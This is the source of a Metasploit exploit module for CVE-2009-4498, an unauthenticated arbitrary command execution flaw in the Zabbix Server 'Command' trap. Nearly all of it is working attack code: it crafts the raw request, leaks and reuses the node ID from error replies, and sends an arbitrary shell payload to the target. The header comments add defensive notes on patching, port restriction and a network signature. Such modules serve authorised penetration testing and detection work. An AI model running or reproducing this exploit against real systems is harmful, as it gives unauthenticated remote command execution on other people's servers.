Path: blob/master/modules/exploits/linux/misc/zabbix_server_exec.rb
# encoding: binary

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2009-4498: the Zabbix Server "Command" trap runs a
# caller-supplied command without authentication.
#
# Defensive notes, from what this file shows:
# * Per the description, the vendor reports versions prior to 1.6.9 as
#   vulnerable, so upgrading to 1.6.9 or later is the fix.
# * The request needs no credentials and goes to RPORT (10051 by default);
#   limiting which hosts can reach that port reduces exposure.
# * Every request starts with the literal "Command" followed by fields
#   separated by byte 0xAD ("\255"), which is what a network signature
#   would match on.
# * +check+ is not passive: it runs an +echo+ command on the target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the default server port.
  #
  # @param info [Hash] metadata merged with this module's defaults
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zabbix Server Arbitrary Command Execution',
        'Description' => %q{
          This module abuses the "Command" trap in Zabbix Server to execute arbitrary
          commands without authentication. By default the Node ID "0" is used, if it doesn't
          work, the Node ID is leaked from the error message and exploitation retried.

          According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability
          has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
        },
        'Author' => [
          'Nicob <nicob[at]nicob.net>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-4498' ],
          [ 'OSVDB', '60965' ],
          [ 'BID', '37989' ],
          [ 'EDB', '10432' ],
          [ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet',
            # *_perl, *_python and *_ruby work if they are installed
          }
        },
        'Targets' => [
          [ 'Zabbix 1.6.7', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Sep 10 2009',
        # NOTE(review): all three values are left as UNKNOWN even though both
        # check and exploit run a command on the target; confirm and fill in.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(10051)])
  end

  # Writes one "Command" request to the socket and performs a single read.
  #
  # The request is "Command", the node ID, a random three-digit host ID and
  # the command, joined by byte 0xAD and terminated by a newline. The command
  # is placed in the message as given; nothing here escapes or validates it.
  #
  # @param sock the connected socket (must respond to +put+ and +get_once+)
  # @param node_id [Integer, String] node ID field of the request
  # @param cmd [String] command field of the request
  # @return the result of a single +sock.get_once+ call; callers treat a
  #   falsy value as "no response"
  def send_command(sock, node_id, cmd)
    host_id = Rex::Text.rand_text_numeric(3)
    request = "Command\255"
    request << "#{node_id}\255"
    request << "#{host_id}\255"
    request << "#{cmd}\n"
    sock.put(request)
    sock.get_once
  end

  # Active check: asks the server to echo a random marker and looks for that
  # marker in the reply. This runs a command on the target, so it is not a
  # passive version check.
  #
  # If the first reply contains "-1" and "NODE <digits>", the reported node ID
  # is used for one retry.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Safe in every other case (including no response)
  def check
    peer = "#{rhost}:#{rport}" # NOTE(review): assigned but never read in this method
    node_id = 0
    clue = Rex::Text.rand_text_alpha(rand(5) + 5)
    cmd = "echo #{clue}"

    connect
    vprint_status("Sending 'Command' request...")
    res = send_command(sock, node_id, cmd)
    disconnect

    # No response
    return Exploit::CheckCode::Safe unless res

    vprint_status(res)
    return Exploit::CheckCode::Vulnerable if res =~ /#{clue}/
    return Exploit::CheckCode::Safe unless res =~ /-1/ && res =~ /NODE (\d*)/

    # The capture comes from the NODE match evaluated on the line above.
    node_id = Regexp.last_match(1)
    vprint_good("Node ID #{node_id} discovered")

    # Retry with the good node_id
    connect
    vprint_status("Sending 'Command' request with discovered Node ID...")
    res = send_command(sock, node_id, cmd)
    disconnect

    res && res =~ /#{clue}/ ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Sends the encoded payload as the command, retrying once with the node ID
  # taken from the error reply when the first attempt is rejected.
  #
  # When the CMD datastore option is set, the reply is searched for the bytes
  # 0x30 0xAD and whatever follows the last occurrence is printed as output.
  def exploit
    peer = "#{rhost}:#{rport}" # NOTE(review): assigned but never read in this method
    node_id = 0
    cmd = payload.encoded

    connect
    print_status("Sending 'Command' request...")
    res = send_command(sock, node_id, cmd)
    disconnect

    if res && res =~ /-1/ && res =~ /NODE (\d*)/
      # Retry with the good node_id
      node_id = Regexp.last_match(1)
      print_good("Node ID #{node_id} discovered")
      connect
      print_status("Sending 'Command' request with discovered Node ID...")
      res = send_command(sock, node_id, cmd)
      disconnect
    end

    # Read command output from socket if cmd/unix/generic payload was used
    return unless datastore['CMD']

    if res && res =~ /\x30\xad/
      print_good("Command executed successfully")
      print_status("Output:\n#{res.split("\x30\xad").last}")
    else
      print_error("Failed to execute the command")
    end
  end
end